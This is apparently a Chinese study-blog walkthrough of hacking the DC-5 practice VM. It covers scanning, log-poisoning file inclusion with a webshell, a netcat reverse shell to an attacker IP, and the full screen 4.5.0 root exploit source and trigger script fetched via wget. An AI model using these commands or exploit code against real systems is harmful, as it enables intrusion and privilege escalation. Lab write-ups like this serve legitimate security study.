[网络安全学习篇73]：渗透测试实战-DC-5-靶机入侵

引言：我的系列博客[网络安全学习篇]上线了，小编也是初次创作博客，经验不足；对千峰网络信息安全开源的视频公开课程的学习整理的笔记整理的也比较粗糙，其实看到目录有300多集的时候，讲道理，有点怂了，所以我就想到了通过写博客（课程笔记）的形式去学习它，虽然写博客会让我多花几倍的时间去学习它，但是当我完成一篇博客所获得的成就感和你们对于我的认同感，让我很满足，能够鼓励我一天天的坚持下去，也希望和我一起学习本期视频的"同道"们也能给一直坚持下去。我们大家一起加油。由于作者本身也是网络信息安全小白，大部分知识点都是初次接触，出现对其理解不深入，不完整，甚至也会出现错误有问题的地方，希望大家谅解、留言提出指正，同时也欢迎大家来找我一起交流学习！！！

往期博客：

第一阶段：

[网络安全学习篇1]：windowsxp、windows2003、windows7、windows2008系统部署（千峰网络安全视频笔记）

[网络安全学习篇24]：漏洞与木马（千峰网络安全视频笔记 p117-p118）

第二阶段：

[网络安全学习篇25]：初识Linux及简单命令

[网络安全学习篇32]：Linux脚本编写汇总及应用

第三阶段：

[网络安全学习篇33]：0基础带你入门python

[网络安全学习篇38]：基础环境搭建

[网络安全学习篇39]：HTML标签基础常用的标签表格

[网络安全学习篇42]：靶场环境搭建（ubuntu系统安装优化及vulhub安装）

[网络安全学习篇43]：PHP基础+变量运算符流程控制语句

[网络安全学习篇48]：JS 基础函数事件）

第四阶段：

[网络安全学习篇49]：渗透测试方法论

[网络安全学习篇50]：Web架构安全分析

[网络安全学习篇66]：Metasploit(MSF)

[网络安全学习篇67]：python poc-exp

[网络安全学习篇68]：反序列化漏洞

[网络安全学习篇69]：渗透测试实战-DC-1-靶机入侵

[网络安全学习篇70]：渗透测试实战-DC-2-靶机入侵

[网络安全学习篇71]：渗透测试实战-DC-3-靶机入侵

[网络安全学习篇72]：渗透测试实战-DC-4-靶机入侵

[网络安全学习篇73]：渗透测试实战-DC-5-靶机入侵（本篇）

下期博文：

[网络安全学习篇74]：渗透测试实战-DC-6-靶机入侵

搭建靶场

链接：https://pan.baidu.com/s/1L-fHw8bNAPHS6jHx1BJA3A
提取码：8r7m

启动

获取其IP地址

nmap -sP 192.168.1.2/24

得到其IP地址为192.168.1.168

nmap -A 192.168.1.168 -p 1-65535 -oN nmap.A

80端口开放，我们尝试访问

使用御剑扫描网站目录

bp 爆破

我们猜测可能存在文件包含

测试是否为动态包含

使用bp 爆破变量名

得到其变量名为file

上传执行木马

文件包含会将包含文件中的php 代码执行，可以通过在系统日志中写入代码，在通过文件文件包含系统日志文件去执行相关php 代码

找到系统日志文件

/var/log/nginx/access.log

将一句话木马写入日志文件

尝试使用蚁剑连接

连接成功

反弹shell ，建立长久性的连接

nc -e /bin/bash 192.168.1.164 2333

反弹成功

nc -lvvp 2333

python -c 'import pty;pty.spawn("/bin/bash")'

提权

查找具有SUID 标志的命令

find / -perm -4000 2>/dev/null

发现screen 4.5.0 存在一个本地特权提升的漏洞

cp /usr/share/exploitdb/exploits/linux/local/41154.sh ./41154.sh

cat 41154.sh

kali 在当前目录下开启http 服务

python -m SimpleHTTPServer

在/tmp 目录下下载wenjian

wget http://192.168.1.164:8000/41154.sh

给执行权限

chmod 777 41154.sh

执行失败

打开41154.sh 脚本文件，尝试本地编译其内的两个c语言程序，将该脚本拆分成3部分，具体内容如下

查看脚本

----libhax.c

#include <stdio.h>

#include <sys/types.h>

#include <unistd.h>

__attribute__ ((__constructor__))

void dropshell(void){

    chown("/tmp/rootshell", 0, 0);

    chmod("/tmp/rootshell", 04755);

    unlink("/etc/ld.so.preload");

    printf("[+] done!\n");

}

编译，生成libhax.so 文件

gcc -fPIC -shared -ldl -o libhax.so libhax.c

-------rootshell.c

#include <stdio.h>

int main(void){

    setuid(0);

    setgid(0);

    seteuid(0);

    setegid(0);

    execvp("/bin/sh", NULL, NULL);

}

编译，生成rootshell 文件

gcc -o rootshell rootshell.c

----getshel.sh

#!/bin/bash

# screenroot.sh

# setuid screen v4.5.0 local root exploit

# abuses ld.so.preload overwriting to get root.

# bug: https://lists.gnu.org/archive/html/screen-devel/2017-01/msg00025.html

# HACK THE PLANET

# ~ infodox (25/1/2017)

echo "[+] Now we create our /etc/ld.so.preload file..."

cd /etc

umask 000 # because

screen -D -m -L ld.so.preload echo -ne  "\x0a/tmp/libhax.so" # newline needed

echo "[+] Triggering..."

screen -ls # screen itself is setuid, so...

/tmp/rootshell

本地开启http服务

python -m SimpleHTTPServer

靶机/tmp 目录下远程下载

wget http://192.168.1.164:8000/rootshell

wget http://192.168.1.164:8000/libhax.so

wget http://192.168.1.164:8000/getshel.sh

运行getshel.sh 文件，进行提权

提权成功，拿到flag

参考文献：

千峰网络信息安全开源课程